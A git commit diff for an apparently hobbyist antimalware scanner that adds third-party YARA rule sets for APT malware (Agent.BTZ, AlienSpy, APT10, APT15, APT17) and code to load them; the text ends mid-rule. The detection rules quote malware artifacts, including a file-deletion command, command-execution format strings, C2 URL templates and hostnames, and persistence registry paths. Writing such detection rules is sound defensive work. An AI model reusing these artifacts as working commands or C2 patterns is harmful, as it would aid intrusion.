OMG ISTG PLS WORK

RED PILL 🔴 💊
This commit is contained in:
Sam Sneed 2024-07-25 12:43:35 -05:00
parent 903b01bdac
commit 08e8d462fe
2919 changed files with 597734 additions and 5 deletions

2
.gitignore vendored Normal file
View file

@ -0,0 +1,2 @@
/yara-hydradragon

View file

@ -0,0 +1,38 @@
# Detection Rule License (DRL) 1.1
Permission is hereby granted, free of charge, to any person obtaining a copy
of this rule set and associated documentation files (the "Rules"), to deal
in the Rules without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Rules, and to permit persons to whom the Rules are furnished to do so,
subject to the following conditions:
If you share the Rules (including in modified form), you must retain the
following if it is supplied within the Rules:
1. identification of the authors(s) ("author" field) of the Rule and any
others designated to receive attribution, in any reasonable manner
requested by the Rule author (including by pseudonym if designated).
2. a URI or hyperlink to the Rule set or explicit Rule to the extent
reasonably practicable
3. indicate the Rules are licensed under this Detection Rule License, and
include the text of, or the URI or hyperlink to, this Detection Rule
License to the extent reasonably practicable
If you use the Rules (including in modified form) on data, messages based on
matches with the Rules must retain the following if it is supplied within the
Rules:
1. identification of the authors(s) ("author" field) of the Rule and any
others designated to receive attribution, in any reasonable manner
requested by the Rule author (including by pseudonym if designated).
THE RULES ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE RULES OR THE USE OR OTHER DEALINGS IN THE
RULES.

View file

@ -0,0 +1,19 @@
Copyright (c) 2020 ReversingLabs
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

View file

@ -5,11 +5,15 @@ Cross-Platform Open Reactive AntiMalware
## Credits
* VirusTotal - Creating Yara
* [ReversingLabs - Creating Yara Rules](https://github.com/reversinglabs/reversinglabs-yara-rules)
* [ReversingLabs - Creating Some Yara Rules](https://github.com/reversinglabs/reversinglabs-yara-rules)
* [Yara23x0 - Creating more Yara Rules](https://github.com/Neo23x0/signature-base)
* [mikesxrc - Creating a compilation of even MORE yara rules (had to delete some due to errors)](https://github.com/mikesxrs/Open-Source-YARA-rules)
* Sneed Group - Creating the idea/code
* ChatGPT/Gemini - Helping code this amazing project
## Licensing Details
* LICENSE-YARA-RULES - ReversingLab's Yara Rules (everything under the yara subdirectory)
* LICENSE - Our code. (Pretty much anything else.)
* LICENSE-YARA-RULES-REVERSINGLABS - ReversingLab's Yara Rules (under the yara-ReversingLabs subdirectory)
* LICENSE-YARA-RULES-NEO23X0 - NEO23X0's Yara Rules (under the yara-Neo23x0 subdirectory)
* LICENSE - Our code. (Pretty much any .py file in the main directory as well as requirements.txt)
* mikesxrs sadly had no license in his Yara Rules repo, so I guess take that for what you will.

23
main.py
View file

@ -23,7 +23,28 @@ import yara # YARA for malware scanning
# YARA Rules
def load_yara_rules():
yara_rules = []
yara_dir = Path('yara')
yara_dir = Path('yara-ReversingLabs')
if yara_dir.exists() and yara_dir.is_dir():
for yara_file in yara_dir.rglob('*.yar'):
try:
rule = yara.compile(filepath=str(yara_file))
yara_rules.append(rule)
except Exception as e:
print(f"Error compiling YARA rule {yara_file}: {e}")
else:
print(f"YARA rules directory not found: {yara_dir}")
time.sleep(1)
yara_dir = Path('yara-mikesxrs')
if yara_dir.exists() and yara_dir.is_dir():
for yara_file in yara_dir.rglob('*.yar'):
try:
rule = yara.compile(filepath=str(yara_file))
yara_rules.append(rule)
except Exception as e:
print(f"Error compiling YARA rule {yara_file}: {e}")
else:
print(f"YARA rules directory not found: {yara_dir}")
yara_dir = Path('yara-Neo23x0')
if yara_dir.exists() and yara_dir.is_dir():
for yara_file in yara_dir.rglob('*.yar'):
try:

View file

@ -0,0 +1,19 @@
rule APT_MAL_DNS_Hijacking_Campaign_AA19_024A {
meta:
description = "Detects malware used in DNS Hijackign campaign"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.us-cert.gov/ncas/alerts/AA19-024A"
date = "2019-01-25"
hash1 = "2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec"
hash2 = "45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff"
id = "6a476052-ba4e-5049-9c7a-f8949d26e7b5"
strings:
$s2 = "/Client/Login?id=" fullword ascii
$s3 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" fullword ascii
$s4 = ".\\Configure.txt" fullword ascii
$s5 = "Content-Disposition: form-data; name=\"files\"; filename=\"" fullword ascii
$s6 = "Content-Disposition: form-data; name=\"txts\"" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them
}

View file

@ -0,0 +1,106 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2017-08-07
Identifier: Agent BTZ
Reference: http://www.intezer.com/new-variants-of-agent-btz-comrat-found/
*/
/* Rule Set ----------------------------------------------------------------- */
import "pe"
rule Agent_BTZ_Proxy_DLL_1 {
meta:
description = "Detects Agent-BTZ Proxy DLL - activeds.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
date = "2017-08-07"
hash1 = "9c163c3f2bd5c5181147c6f4cf2571160197de98f496d16b38c7dc46b5dc1426"
hash2 = "628d316a983383ed716e3f827720915683a8876b54677878a7d2db376d117a24"
id = "f8032616-2a54-5107-b330-65fcc84b866e"
strings:
$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Modules" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 300KB and all of them and pe.exports("Entry") )
}
rule Agent_BTZ_Proxy_DLL_2 {
meta:
description = "Detects Agent-BTZ Proxy DLL - activeds.dll"
author = "Florian Roth (Nextron Systems)"
reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
date = "2017-08-07"
hash1 = "73db4295c5b29958c5d93c20be9482c1efffc89fc4e5c8ba59ac9425a4657a88"
hash2 = "380b0353ba8cd33da8c5e5b95e3e032e83193019e73c71875b58ec1ed389bdac"
hash3 = "f27e9bba6a2635731845b4334b807c0e4f57d3b790cecdc77d8fef50629f51a2"
id = "2777443d-6f63-5948-855a-e064a6e0310f"
strings:
$s1 = { 38 21 38 2C 38 37 38 42 38 4D 38 58 38 63 38 6E
38 79 38 84 38 8F 38 9A 38 A5 38 B0 38 BB 38 C6
38 D1 38 DC 38 E7 38 F2 38 FD 38 08 39 13 39 1E
39 29 39 34 39 3F 39 4A 39 55 39 60 39 6B 39 76
39 81 39 8C 39 97 39 A2 39 AD 39 B8 39 C3 39 CE
39 D9 39 E4 39 EF 39 FA 39 05 3A 10 3A 1B 3A 26
3A 31 3A 3C 3A 47 3A 52 3A 5D 3A 68 3A 73 3A 7E
3A 89 3A 94 3A 9F 3A AA 3A B5 3A C0 3A CB 3A D6
3A E1 3A EC 3A F7 3A }
$s2 = "activeds.dll" ascii fullword
condition:
uint16(0) == 0x5a4d and filesize < 200KB and all of them and pe.imphash() == "09b7c73fbe5529e6de7137e3e8268b7b"
}
rule Agent_BTZ_Aug17 {
meta:
description = "Detects Agent.BTZ"
author = "Florian Roth (Nextron Systems)"
reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
date = "2017-08-07"
hash1 = "6ad78f069c3619d0d18eef8281219679f538cfe0c1b6d40b244beb359762cf96"
hash2 = "49c5c798689d4a54e5b7099b647b0596fb96b996a437bb8241b5dd76e974c24e"
hash3 = "e88970fa4892150441c1616028982fe63c875f149cd490c3c910a1c091d3ad49"
id = "31804208-3edb-554b-8820-e682db647435"
strings:
$s1 = "stdole2.tlb" fullword ascii
$s2 = "UnInstallW" fullword ascii
condition:
(
uint16(0) == 0x5a4d and filesize < 900KB and
all of them and
pe.exports("Entry") and pe.exports("InstallW") and pe.exports("UnInstallW")
)
}
rule APT_Turla_Agent_BTZ_Gen_1 {
meta:
description = "Detects Turla Agent.BTZ"
author = "Florian Roth (Nextron Systems)"
reference = "Internal Research"
date = "2018-06-16"
score = 80
hash1 = "c905f2dec79ccab115ad32578384008696ebab02276f49f12465dcd026c1a615"
id = "d5e1dd3d-4f03-5f79-898b-e612d2758b60"
strings:
$x1 = "1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s" fullword ascii
$s1 = "release mutex - %u (%u)(%u)" fullword ascii
$s2 = "\\system32\\win.com" ascii
$s3 = "Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)" fullword ascii
$s4 = "MakeFile Error(%d) copy file to temp file %s" fullword ascii
$s5 = "%s%%s08x.tmp" fullword ascii
$s6 = "Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d)" fullword ascii
$s7 = "Mutex_Log" fullword ascii
$s8 = "%s\\system32\\winview.ocx" fullword ascii
$s9 = "Microsoft(R) Windows (R) Operating System" fullword wide
$s10 = "Error: pos(%d) > CmdSize(%d)" fullword ascii
$s11 = "\\win.com" ascii
$s12 = "Error(%d) run %s " fullword ascii
$s13 = "%02d.%02d.%04d Log begin:" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 500KB and (
pe.imphash() == "9d0d6daa47d6e6f2d80eb05405944f87" or
( pe.exports("Entry") and pe.exports("InstallM") and pe.exports("InstallS") ) or
$x1 or 3 of them
) or ( 5 of them )
}

View file

@ -0,0 +1,50 @@
rule crime_win_rat_AlienSpy
{
meta:
description = "Alien Spy Remote Access Trojan"
author = "General Dynamics Fidelis Cybersecurity Solutions - Threat Research Team"
reference_1 = "www.fidelissecurity.com/sites/default/files/FTA_1015_Alienspy_FINAL.pdf"
reference_2 = "www.fidelissecurity.com/sites/default/files/AlienSpy-Configs2_1_2.csv"
date = "04-Apr-15"
filetype = "Java"
hash_1 = "075fa0567d3415fbab3514b8aa64cfcb"
hash_2 = "818afea3040a887f191ee9d0579ac6ed"
hash_3 = "973de705f2f01e82c00db92eaa27912c"
hash_4 = "7f838907f9cc8305544bd0ad4cfd278e"
hash_5 = "071e12454731161d47a12a8c4b3adfea"
hash_6 = "a7d50760d49faff3656903c1130fd20b"
hash_7 = "f399afb901fcdf436a1b2a135da3ee39"
hash_8 = "3698a3630f80a632c0c7c12e929184fb"
hash_9 = "fdb674cadfa038ff9d931e376f89f1b6"
id = "a79789cd-9b16-58f5-ab51-48bb900583d1"
strings:
$sa_1 = "META-INF/MANIFEST.MF"
$sa_2 = "Main.classPK"
$sa_3 = "plugins/Server.classPK"
$sa_4 = "IDPK"
$sb_1 = "config.iniPK"
$sb_2 = "password.iniPK"
$sb_3 = "plugins/Server.classPK"
$sb_4 = "LoadStub.classPK"
$sb_5 = "LoadStubDecrypted.classPK"
$sb_7 = "LoadPassword.classPK"
$sb_8 = "DecryptStub.classPK"
$sb_9 = "ClassLoaders.classPK"
$sc_1 = "config.xml"
$sc_2 = "options"
$sc_3 = "plugins"
/* $sc_4 = "util" */
$sc_5 = "util/OSHelper"
$sc_6 = "Start.class"
$sc_7 = "AlienSpy"
/* $sc_8 = "PK" */ /* too short atom - disabled for performance reasons */
condition:
uint16(0) == 0x4B50 and filesize < 800KB and ( (all of ($sa_*)) or (all of ($sb_*)) or (all of ($sc_*)) )
}

1406
yara-Neo23x0/apt_apt10.yar Normal file

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,48 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2018-05-01
Identifier: APT10 / Hogfish Report
Reference: https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf
*/
/* Rule Set ----------------------------------------------------------------- */
import "pe"
rule MAL_Hogfish_Report_Related_Sample {
meta:
description = "Detects APT10 / Hogfish related samples"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
date = "2018-05-01"
hash1 = "f9acc706d7bec10f88f9cfbbdf80df0d85331bd4c3c0188e4d002d6929fe4eac"
hash2 = "7188f76ca5fbc6e57d23ba97655b293d5356933e2ab5261e423b3f205fe305ee"
hash3 = "4de5a22cd798950a69318fdcc1ec59e9a456b4e572c2d3ac4788ee96a4070262"
id = "7fc4fdda-b71f-5c9c-87a4-5d8290b99348"
strings:
$s1 = "R=user32.dll" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and (
pe.imphash() == "efad9ff8c0d2a6419bf1dd970bcd806d" or
1 of them
)
}
rule MAL_RedLeaves_Apr18_1 {
meta:
description = "Detects RedLeaves malware"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
date = "2018-05-01"
hash1 = "f6449e255bc1a9d4a02391be35d0dd37def19b7e20cfcc274427a0b39cb21b7b"
hash2 = "db7c1534dede15be08e651784d3a5d2ae41963d192b0f8776701b4b72240c38d"
hash3 = "d956e2ff1b22ccee2c5d9819128103d4c31ecefde3ce463a6dea19ecaaf418a1"
id = "578b40d7-6818-56d5-92ce-535141c0aa8e"
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and (
pe.imphash() == "7a861cd9c495e1d950a43cb708a22985" or
pe.imphash() == "566a7a4ef613a797389b570f8b4f79df"
)
}

View file

@ -0,0 +1,25 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2017-08-30
Identifier: APT 12 Japanese Incident
Reference: http://blog.macnica.net/blog/2017/08/post-fb81.html
*/
/* Rule Set ----------------------------------------------------------------- */
import "pe"
rule APT12_Malware_Aug17 {
meta:
description = "Detects APT 12 Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blog.macnica.net/blog/2017/08/post-fb81.html"
date = "2017-08-30"
hash1 = "dc7521c00ec2534cf494c0263ddf67ea4ba9915eb17bdc0b3ebe9e840ec63643"
hash2 = "42da51b69bd6625244921a4eef9a2a10153e012a3213e8e9877cf831aea3eced"
id = "6c9cd68f-b839-5c99-a9f5-14c2d8a28bec"
condition:
( uint16(0) == 0x5a4d and pe.imphash() == "9ba915fd04f248ad62e856c7238c0264" )
}

307
yara-Neo23x0/apt_apt15.yar Normal file
View file

@ -0,0 +1,307 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2018-03-10
Identifier: APT15 Report
Reference: https://goo.gl/HZ5XMN
*/
/* Rule Set ----------------------------------------------------------------- */
import "pe"
rule APT15_Malware_Mar18_RoyalCli {
meta:
description = "Detects malware from APT 15 report by NCC Group"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/HZ5XMN"
date = "2018-03-10"
hash1 = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785"
id = "165bfa6c-1a8d-5628-8c35-da4e4a2ae04f"
strings:
$s1 = "\\Release\\RoyalCli.pdb" ascii
$s2 = "%snewcmd.exe" fullword ascii
$s3 = "Run cmd error %d" fullword ascii
$s4 = "%s~clitemp%08x.ini" fullword ascii
$s5 = "run file failed" fullword ascii
$s6 = "Cmd timeout %d" fullword ascii
$s7 = "2 %s %d 0 %d" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 200KB and 2 of them
}
rule APT15_Malware_Mar18_RoyalDNS {
meta:
description = "Detects malware from APT 15 report by NCC Group"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/HZ5XMN"
date = "2018-03-10"
hash1 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
id = "c2f519db-2750-53ce-ae18-697ea041faaf"
strings:
$x1 = "del c:\\windows\\temp\\r.exe /f /q" fullword ascii
$x2 = "%s\\r.exe" fullword ascii
$s1 = "rights.dll" fullword ascii
$s2 = "\"%s\">>\"%s\"\\s.txt" fullword ascii
$s3 = "Nwsapagent" fullword ascii
$s4 = "%s\\r.bat" fullword ascii
$s5 = "%s\\s.txt" fullword ascii
$s6 = "runexe" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 200KB and (
( pe.exports("RunInstallA") and pe.exports("RunUninstallA") ) or
1 of ($x*) or
2 of them
)
}
rule APT15_Malware_Mar18_BS2005 {
meta:
description = "Detects malware from APT 15 report by NCC Group"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/HZ5XMN"
date = "2018-03-10"
hash1 = "750d9eecd533f89b8aa13aeab173a1cf813b021b6824bc30e60f5db6fa7b950b"
id = "700bbe14-d79e-5a35-aab3-31eacd5bd950"
strings:
$x1 = "AAAAKQAASCMAABi+AABnhEBj8vep7VRoAEPRWLweGc0/eiDrXGajJXRxbXsTXAcZAABK4QAAPWwAACzWAAByrg==" fullword ascii
$x2 = "AAAAKQAASCMAABi+AABnhKv3kXJJousn5YzkjGF46eE3G8ZGse4B9uoqJo8Q2oF0AABK4QAAPWwAACzWAAByrg==" fullword ascii
$a1 = "http://%s/content.html?id=%s" fullword ascii
$a2 = "http://%s/main.php?ssid=%s" fullword ascii
$a3 = "http://%s/webmail.php?id=%s" fullword ascii
$a9 = "http://%s/error.html?tab=%s" fullword ascii
$s1 = "%s\\~tmp.txt" fullword ascii
$s2 = "%s /C %s >>\"%s\" 2>&1" fullword ascii
$s3 = "DisableFirstRunCustomize" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 200KB and (
1 of ($x*) or
2 of them
)
}
rule APT15_Malware_Mar18_MSExchangeTool {
meta:
description = "Detects malware from APT 15 report by NCC Group"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/HZ5XMN"
date = "2018-03-10"
hash1 = "16b868d1bef6be39f69b4e976595e7bd46b6c0595cf6bc482229dbb9e64f1bce"
id = "81b826b6-8c2e-5a8a-a626-9515d40dbbb0"
strings:
$s1 = "\\Release\\EWSTEW.pdb" ascii
$s2 = "EWSTEW.exe" fullword wide
$s3 = "Microsoft.Exchange.WebServices.Data" fullword ascii
$s4 = "tmp.dat" fullword wide
$s6 = "/v or /t is null" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 40KB and all of them
}
/*
Identifier: APT15 = Mirage = Ke3chang
Author: NCCGroup
Revised by Florian Roth for performance reasons
see https://gist.github.com/Neo23x0/e3d4e316d7441d9143c7
> some rules were untightened
Date: 2018-03-09
Reference: https://github.com/nccgroup/Royal_APT/blob/master/signatures/apt15.yara
*/
rule clean_apt15_patchedcmd{
meta:
author = "Ahmed Zaki"
description = "This is a patched CMD. This is the CMD that RoyalCli uses."
sha256 = "90d1f65cfa51da07e040e066d4409dc8a48c1ab451542c894a623bc75c14bf8f"
id = "c6867ad4-f7f2-5d63-bffd-07599ede635d"
strings:
$ = "eisableCMD" wide
$ = "%WINDOWS_COPYRIGHT%" wide
$ = "Cmd.Exe" wide
$ = "Windows Command Processor" wide
condition:
uint16(0) == 0x5A4D and all of them
}
rule malware_apt15_royalcli_1{
meta:
description = "Generic strings found in the Royal CLI tool"
author = "David Cannings"
sha256 = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785"
id = "432c09bf-3c44-5a2c-ba69-7b4fe7eb43cc"
strings:
$ = "%s~clitemp%08x.tmp" fullword
$ = "%s /c %s>%s" fullword
$ = "%snewcmd.exe" fullword
$ = "%shkcmd.exe" fullword
$ = "%s~clitemp%08x.ini" fullword
$ = "myRObject" fullword
$ = "myWObject" fullword
$ = "2 %s %d 0 %d\x0D\x0A"
$ = "2 %s %d 1 %d\x0D\x0A"
$ = "%s file not exist" fullword
condition:
uint16(0) == 0x5A4D and 5 of them
}
rule malware_apt15_royalcli_2{
meta:
author = "Nikolaos Pantazopoulos"
description = "APT15 RoyalCli backdoor"
id = "d4acfd2d-385d-5063-898e-d339b50733eb"
strings:
$string1 = "%shkcmd.exe" fullword
$string2 = "myRObject" fullword
$string3 = "%snewcmd.exe" fullword
$string4 = "%s~clitemp%08x.tmp" fullword
$string6 = "myWObject" fullword
condition:
uint16(0) == 0x5A4D and 2 of them
}
/*
rule malware_apt15_bs2005{
meta:
author = "Ahmed Zaki"
md5 = "ed21ce2beee56f0a0b1c5a62a80c128b"
description = "APT15 bs2005"
strings:
$ = "%s&%s&%s&%s" wide ascii
$ = "%s\\%s" wide ascii fullword
$ = "WarOnPostRedirect" wide ascii fullword
$ = "WarnonZoneCrossing" wide ascii fullword
$ = "^^^^^" wide ascii fullword
$ = /"?%s\s*"?\s*\/C\s*"?%s\s*>\s*\\?"?%s\\(\w+\.\w+)?"\s*2>&1\s*"?/
$ ="IEharden" wide ascii fullword
$ ="DEPOff" wide ascii fullword
$ ="ShownVerifyBalloon" wide ascii fullword
$ ="IEHardenIENoWarn" wide ascii fullword
condition:
( uint16(0) == 0x5A4D and 5 of them ) or
( uint16(0) == 0x5A4D and 3 of them and
( pe.imports("advapi32.dll", "CryptDecrypt") and pe.imports("advapi32.dll", "CryptEncrypt") and
pe.imports("ole32.dll", "CoCreateInstance")
)
)
}
*/
rule malware_apt15_royaldll {
meta:
author = "David Cannings"
description = "DLL implant, originally rights.dll and runs as a service"
sha256 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
id = "26baef92-1055-56dc-b274-e2a6bc05d85b"
strings:
/*
56 push esi
B8 A7 C6 67 4E mov eax, 4E67C6A7h
83 C1 02 add ecx, 2
BA 04 00 00 00 mov edx, 4
57 push edi
90 nop
*/
// JSHash implementation (Justin Sobel's hash algorithm)
$opcodes_jshash = { B8 A7 C6 67 4E 83 C1 02 BA 04 00 00 00 57 90 }
/*
0F B6 1C 03 movzx ebx, byte ptr [ebx+eax]
8B 55 08 mov edx, [ebp+arg_0]
30 1C 17 xor [edi+edx], bl
47 inc edi
3B 7D 0C cmp edi, [ebp+arg_4]
72 A4 jb short loc_10003F31
*/
// Encode loop, used to "encrypt" data before DNS request
$opcodes_encode = { 0F B6 1C 03 8B 55 08 30 1C 17 47 3B 7D 0C }
/*
68 88 13 00 00 push 5000 # Also seen 3000, included below
FF D6 call esi ; Sleep
4F dec edi
75 F6 jnz short loc_10001554
*/
// Sleep loop
$opcodes_sleep_loop = { 68 (88|B8) (13|0B) 00 00 FF D6 4F 75 F6 }
// Generic strings
$ = "Nwsapagent" fullword
$ = "\"%s\">>\"%s\"\\s.txt"
$ = "myWObject" fullword
$ = "del c:\\windows\\temp\\r.exe /f /q"
$ = "del c:\\windows\\temp\\r.ini /f /q"
condition:
3 of them
}
rule malware_apt15_royaldll_2 {
meta:
author = "Ahmed Zaki"
sha256 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
description = "DNS backdoor used by APT15"
id = "3bc546a5-38b9-5504-b09e-305ba7bbd6bc"
strings:
$= "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" wide ascii
$= "netsvcs" wide ascii fullword
$= "%SystemRoot%\\System32\\svchost.exe -k netsvcs" wide ascii fullword
$= "SYSTEM\\CurrentControlSet\\Services\\" wide ascii
$= "myWObject" wide ascii
condition:
uint16(0) == 0x5A4D and all of them
and pe.exports("ServiceMain")
and filesize > 50KB and filesize < 600KB
}
rule malware_apt15_exchange_tool {
meta:
author = "Ahmed Zaki"
md5 = "d21a7e349e796064ce10f2f6ede31c71"
description = "This is a an exchange enumeration/hijacking tool used by an APT 15"
id = "f07b9537-0741-51c8-a9fa-836430fe4855"
strings:
$s1= "subjectname" fullword
$s2= "sendername" fullword
$s3= "WebCredentials" fullword
$s4= "ExchangeVersion" fullword
$s5= "ExchangeCredentials" fullword
$s6= "slfilename" fullword
$s7= "EnumMail" fullword
$s8= "EnumFolder" fullword
$s9= "set_Credentials" fullword
$s18 = "/v or /t is null" wide
$s24 = "2013sp1" wide
condition:
uint16(0) == 0x5A4D and all of them
}
rule malware_apt15_generic {
meta:
author = "David Cannings"
description = "Find generic data potentially relating to AP15 tools"
id = "4eb50731-22df-5f7a-bf5f-166ef84cf8b5"
strings:
// Appears to be from copy/paste code
$str01 = "myWObject" fullword
$str02 = "myRObject" fullword
/*
6A 02 push 2 ; dwCreationDisposition
6A 00 push 0 ; lpSecurityAttributes
6A 00 push 0 ; dwShareMode
68 00 00 00 C0 push 0C0000000h ; dwDesiredAccess
50 push eax ; lpFileName
FF 15 44 F0 00 10 call ds:CreateFileA
*/
// Arguments for CreateFileA
$opcodes01 = { 6A (02|03) 6A 00 6A 00 68 00 00 00 C0 50 FF 15 }
condition:
2 of them
}

View file

@ -0,0 +1,107 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2017-10-03
Identifier: APT17 Oct 10
Reference: https://goo.gl/puVc9q
*/
/* Rule Set ----------------------------------------------------------------- */
import "pe"
rule APT17_Malware_Oct17_1 {
meta:
description = "Detects APT17 malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/puVc9q"
date = "2017-10-03"
hash1 = "dc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83"
id = "457312d8-5bfe-5282-9ace-2f169278569c"
strings:
$s1 = "\\spool\\prtprocs\\w32x86\\localspl.dll" ascii
$s2 = "\\spool\\prtprocs\\x64\\localspl.dll" ascii
$s3 = "\\msvcrt.dll" ascii
$s4 = "\\TSMSISrv.dll" ascii
condition:
( uint16(0) == 0x5a4d and filesize < 500KB and all of them )
}
rule APT17_Malware_Oct17_2 {
meta:
description = "Detects APT17 malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/puVc9q"
date = "2017-10-03"
hash1 = "20cd49fd0f244944a8f5ba1d7656af3026e67d170133c1b3546c8b2de38d4f27"
id = "9f21514a-168b-5158-8322-60fa8499b11a"
strings:
$x1 = "Cookie: __xsptplus=%s" fullword ascii
$x2 = "http://services.fiveemotions.co.jp" fullword ascii
$x3 = "http://%s/ja-JP/2015/%d/%d/%d%d%d%d%d%d%d%d.gif" fullword ascii
$s1 = "FoxHTTPClient_EXE_x86.exe" fullword ascii
$s2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.3072" ascii
$s3 = "hWritePipe2 Error:%d" fullword ascii
$s4 = "Not Support This Function!" fullword ascii
$s5 = "Global\\PnP_No_Management" fullword ascii
$s6 = "Content-Type: image/x-png" fullword ascii
$s7 = "Accept-Language: ja-JP" fullword ascii
$s8 = "IISCMD Error:%d" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 100KB and (
pe.exports("_foo@0") or
1 of ($x*) or
6 of them
)
}
rule APT17_Unsigned_Symantec_Binary_EFA {
meta:
description = "Detects APT17 malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/puVc9q"
date = "2017-10-03"
hash1 = "128aca58be325174f0220bd7ca6030e4e206b4378796e82da460055733bb6f4f"
id = "56eec517-8b00-5cb5-9806-249e50f53b99"
strings:
$s1 = "Copyright (c) 2007 - 2011 Symantec Corporation" fullword wide
$s2 = "\\\\.\\SYMEFA" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 200KB and all of them and pe.number_of_signatures == 0 )
}
rule APT17_Malware_Oct17_Gen {
meta:
description = "Detects APT17 malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/puVc9q"
date = "2017-10-03"
hash1 = "0375b4216334c85a4b29441a3d37e61d7797c2e1cb94b14cf6292449fb25c7b2"
hash2 = "07f93e49c7015b68e2542fc591ad2b4a1bc01349f79d48db67c53938ad4b525d"
